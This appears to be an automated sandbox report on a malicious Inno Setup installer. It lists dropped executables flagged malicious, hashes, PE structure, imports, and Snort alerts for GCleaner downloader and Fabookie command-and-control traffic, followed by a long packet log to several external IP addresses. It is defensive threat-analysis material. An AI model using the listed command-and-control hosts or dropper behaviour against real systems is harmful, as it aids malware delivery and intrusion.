C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	778752
Entropy (8bit):	6.357908612813808
Encrypted:	false
SSDEEP:	12288:cpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOG:2mt2bfrP437QzH/A6A7E7dVPUxOG
MD5:	E8176050192FBB976D70238E3C121F4C
SHA1:	2F1FD24EFE1F3F3FEE775CC3F5255B32F8880900
SHA-256:	AB4FE42A7B708DDB648BB2088216FF47B877AE599FD52FF50359FC1DB8E11EF7
SHA-512:	27EDF7A71C6546F1AB52E7EF97E404975DDD237D6C2D1038D24A49EAB724971884510F00F427C713ADB105857A0B12C7D57CA1CA1C70A6CEFED4BE619C345F4C
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe

Download File

Process:	C:\Program Files (x86)\Split Files\SplitFiles131.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.20389308045717
Encrypted:	false
SSDEEP:	1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
MD5:	3FB36CB0B7172E5298D2992D42984D06
SHA1:	439827777DF4A337CBB9FA4A4640D0D3FA1738B7
SHA-256:	27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
SHA-512:	6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
Entropy (8bit):	7.9318000564899
TrID:	Win32 Executable (generic) a (10002005/4) 98.88% Inno Setup installer (109748/4) 1.08% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2094367
MD5:	e0f8085c7cb8eb9cf1c263bb12cfc6df
SHA1:	a109ebcf251a1e69923c60330994190e40ab466c
SHA256:	a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
SHA512:	11f39030a9e5f5a095c85aa087fe949ed7e83e1a53a3df487baab09a38d5e744150a8d4e7b34eaec28678561861e640cb34231b893a7f38751f143d0ea1305d1
SSDEEP:	49152:XirWlOmsJ8sSNd3HEKBqd0yLaS1vNf+8UkqBx:XiClONJu3HEKBqd0yLaGFfvqH
TLSH:	9FA51232715472EEFCE369B0584F426D66236FB3A1A87E2E310A37365A61331F115F1A
File Content Preview:	MZP.....................@.......................Inno....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	b8ba6cc880e1f204

Static PE Info

General

Entrypoint:	0x409820
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	e92b45c54aa05ec107d5ef90662e6b33

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFD4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-1Ch], eax
call 00007FC5F939961Bh
call 00007FC5F939A8C6h
call 00007FC5F939CAC9h
call 00007FC5F939CB10h
call 00007FC5F939F107h
call 00007FC5F939F26Eh
mov esi, 0040BDE0h
xor eax, eax
push ebp
push 00409F05h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 00409EBBh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040B014h]
call 00007FC5F939FC5Fh
call 00007FC5F939F81Eh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007FC5F939CF84h
mov edx, dword ptr [ebp-10h]
mov eax, 0040BDD4h
call 00007FC5F93996C7h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040BDD4h]
mov dl, 01h
mov eax, 00407158h
call 00007FC5F939D66Bh
mov dword ptr [0040BDD8h], eax
xor edx, edx
push ebp
push 00409E99h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
lea edx, dword ptr [ebp-18h]
mov eax, dword ptr [0040BDD8h]
call 00007FC5F939D767h
mov ebx, dword ptr [ebp-18h]
mov edx, 00000030h
mov eax, dword ptr [0040BDD8h]
call 00007FC5F939D8A1h
mov edx, esi
mov ecx, 0000000Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc000	0x8f0	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x1f558	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf000	0x0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xe000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x8f94	0x9000	False	0.6195203993055556	data	6.591638965772245	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0xa000	0x248	0x400	False	0.306640625	data	2.7093261929320986	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xb000	0xe64	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xc000	0x8f0	0xa00	False	0.3953125	data	4.294209855544776	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xd000	0x8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xe000	0x18	0x200	False	0.052734375	data	0.1991075177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xf000	0x884	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x1f558	0x1f600	False	0.37483659113545814	data	4.9335056025106585	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1039c	0x51f3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x15590	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States
RT_ICON	0x25db8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0	English	United States
RT_ICON	0x29fe0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States
RT_ICON	0x2c588	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States
RT_ICON	0x2d630	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States
RT_ICON	0x2dfb8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States
RT_STRING	0x2e420	0x2f2	data
RT_STRING	0x2e714	0x30c	data
RT_STRING	0x2ea20	0x2ce	data
RT_STRING	0x2ecf0	0x68	data
RT_STRING	0x2ed58	0xb4	data
RT_STRING	0x2ee0c	0xae	data
RT_GROUP_ICON	0x2eebc	0x68	data	English	United States
RT_VERSION	0x2ef24	0x3a8	data	English	United States
RT_MANIFEST	0x2f2cc	0x289	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll	WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll	TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll	InitCommonControls
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
107.182.129.235192.168.2.580497062852925 01/05/23-08:47:10.017687	TCP	2852925	ETPRO TROJAN GCleaner Downloader - Payload Response	80	49706	107.182.129.235	192.168.2.5
192.168.2.545.139.105.17149705802041920 01/05/23-08:47:09.800462	TCP	2041920	ET TROJAN GCleaner Downloader Activity M8	49705	80	192.168.2.5	45.139.105.171
192.168.2.5107.182.129.23549706802852981 01/05/23-08:47:09.990287	TCP	2852981	ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET)	49706	80	192.168.2.5	107.182.129.235
192.168.2.5107.182.129.23549706802852980 01/05/23-08:47:09.925610	TCP	2852980	ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET)	49706	80	192.168.2.5	107.182.129.235

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2023 08:47:09.771787882 CET	49705	80	192.168.2.5	45.139.105.171
Jan 5, 2023 08:47:09.799809933 CET	80	49705	45.139.105.171	192.168.2.5
Jan 5, 2023 08:47:09.799943924 CET	49705	80	192.168.2.5	45.139.105.171
Jan 5, 2023 08:47:09.800462008 CET	49705	80	192.168.2.5	45.139.105.171
Jan 5, 2023 08:47:09.827680111 CET	80	49705	45.139.105.171	192.168.2.5
Jan 5, 2023 08:47:09.836986065 CET	80	49705	45.139.105.171	192.168.2.5
Jan 5, 2023 08:47:09.837126970 CET	49705	80	192.168.2.5	45.139.105.171
Jan 5, 2023 08:47:09.897756100 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:09.924849987 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:09.925086021 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:09.925610065 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:09.952578068 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:09.952980042 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:09.953092098 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:09.990287066 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.017482042 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.017687082 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.017736912 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.017781973 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.017790079 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.017816067 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.017849922 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.017884970 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.017935991 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.017944098 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.017982960 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.017983913 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.018007994 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.018030882 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.018032074 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.018080950 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.018090963 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.018136024 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045037031 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045104027 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045137882 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045152903 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045172930 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045201063 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045212984 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045250893 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045254946 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045298100 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045305014 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045345068 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045346975 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045392990 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045394897 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045439959 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045439959 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045488119 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045490026 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045533895 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045536995 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045581102 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045583010 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045628071 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045628071 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045677900 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045680046 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045723915 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045728922 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045772076 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045772076 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045819998 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045825005 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045865059 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045869112 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045916080 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045917034 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.045964003 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.045968056 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.046013117 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.072890043 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073029995 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073051929 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073117971 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073136091 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073177099 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073189974 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073235989 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073251963 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073295116 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073312998 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073354006 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073359966 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073417902 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073420048 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073477030 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073477030 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073535919 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073538065 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073592901 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073592901 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073649883 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073651075 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073707104 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073707104 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073762894 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073765039 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073822021 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073822021 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073880911 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073883057 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073937893 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.073940992 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.073998928 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074003935 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074055910 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074055910 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074120998 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074141026 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074198961 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074201107 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074255943 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074258089 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074311972 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074312925 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074368000 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074368954 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074425936 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074426889 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074491978 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074493885 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074548006 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074548960 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074605942 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074608088 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074661016 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074661970 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074733973 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074769974 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074827909 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074831009 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074883938 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074892044 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.074944019 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.074947119 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.075001001 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.075006008 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.075064898 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.075066090 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.075122118 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.075125933 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.075181961 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.075184107 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.075237989 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.075237989 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.075295925 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.075298071 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.075352907 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.075354099 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.075409889 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.102828026 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.102950096 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.102956057 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.103014946 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.103024006 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.103070021 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.103070021 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:10.103127956 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:10.156533957 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:10.183954954 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:10.184079885 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:10.184628010 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:10.211810112 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:10.635227919 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:10.635335922 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:12.711500883 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:12.738816023 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:13.094685078 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:13.094835997 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:14.841079950 CET	80	49705	45.139.105.171	192.168.2.5
Jan 5, 2023 08:47:14.841185093 CET	49705	80	192.168.2.5	45.139.105.171
Jan 5, 2023 08:47:15.078236103 CET	80	49706	107.182.129.235	192.168.2.5
Jan 5, 2023 08:47:15.078341961 CET	49706	80	192.168.2.5	107.182.129.235
Jan 5, 2023 08:47:15.194849014 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:15.222347975 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:15.582741022 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:15.582932949 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:18.399646997 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:18.426881075 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:18.811140060 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:18.811424017 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:20.899158001 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:20.929702997 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:21.282871008 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:21.282958984 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:23.423401117 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:23.451078892 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:23.864329100 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:23.864563942 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:25.946579933 CET	49707	80	192.168.2.5	171.22.30.106
Jan 5, 2023 08:47:25.973993063 CET	80	49707	171.22.30.106	192.168.2.5
Jan 5, 2023 08:47:26.442823887 CET	80	49707	171.22.30.106	192.168.2.5
